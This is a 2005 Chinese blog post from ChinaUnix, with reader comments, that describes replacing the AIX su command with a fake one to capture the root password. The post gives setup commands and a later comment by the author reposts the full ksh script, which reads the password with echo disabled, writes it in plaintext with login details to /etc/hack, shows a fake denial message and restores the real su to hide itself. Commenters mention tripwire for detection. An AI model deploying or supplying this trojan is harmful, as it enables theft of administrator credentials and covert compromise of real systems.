博客首页 注册 建议与交流 排行榜 加入友情链接
推荐 投诉 搜索: 帮助

星瞳——吾爱

本BLOG的技术类文章,未注明转贴,都是原创。放在“原创”文件夹的肯定是原创;其它文件夹的有些文章因部分文字是网上各处摘录的,故未放在“原创”文件夹中。 我的另一BLOG是 http://www.aixchina.net/?1865
AIX下一个假su的脚本(原创)

假如我是个黑客,又假如我通过溢出获得一台AIX的超级用户权限,再假如我想得到root的密码,那么我会这样做:

touch /etc/hack
chmod 666 /etc/hack
mv /usr/bin/su /usr/bin/su2

然后写个假的su

su


chmod 555 /usr/bin/su


如果你是系统的管理员,你能发现这样的行为吗?

发表于: 2005-02-17,修改于: 2005-02-17 14:43,已浏览1116次,有评论7条 推荐 投诉
网友: 匿名网友 时间:2005-02-18 00:47:16 IP地址:61.51.141.★
有root权限,直接修改root密码不可以吗?

网友: 匿名网友 时间:2005-02-18 09:04:13 IP地址:202.74.105.★


网友: 匿名网友 时间:2005-03-21 21:44:28 IP地址:218.79.2.★
tripwire

网友: 匿名网友 时间:2005-03-21 21:44:28 IP地址:218.79.2.★
tripwire

网友: beginner-bj 时间:2005-03-21 22:48:21 IP地址:219.133.24.★
如果这个脚本存活的时间很短,还是很有可能逃过tripwire的眼睛的。

网友: beginner-bj 时间:2005-03-21 22:48:21 IP地址:219.133.24.★
如果这个脚本存活的时间很短,还是很有可能逃过tripwire的眼睛的。

网友: beginner-bj 时间:2008-05-20 23:11:19 IP地址:219.134.2.★
发现本文被很多人转贴,但格式都是乱的,这和2005年时的CU BLOG有关。现在重新贴一下:

#!/bin/ksh
# script name: su
# function: a fake su used in AIX
# author: beginner@yeah.net http://blog.chinaunix.net/index.php?blogId=739 
printf "root's Password:"
stty -echo
read PASSWD
stty echo
date >> /etc/hack
who >> /etc/hack
echo "$PASSWD" >> /etc/hack
printf "\n3004-501 Cannot su to "root" : Authentication is denied.\n"
mv -f /usr/bin/su2 /usr/bin/su


给我留言
版权所有 ChinaUnix.net 页面生成时间:0.01052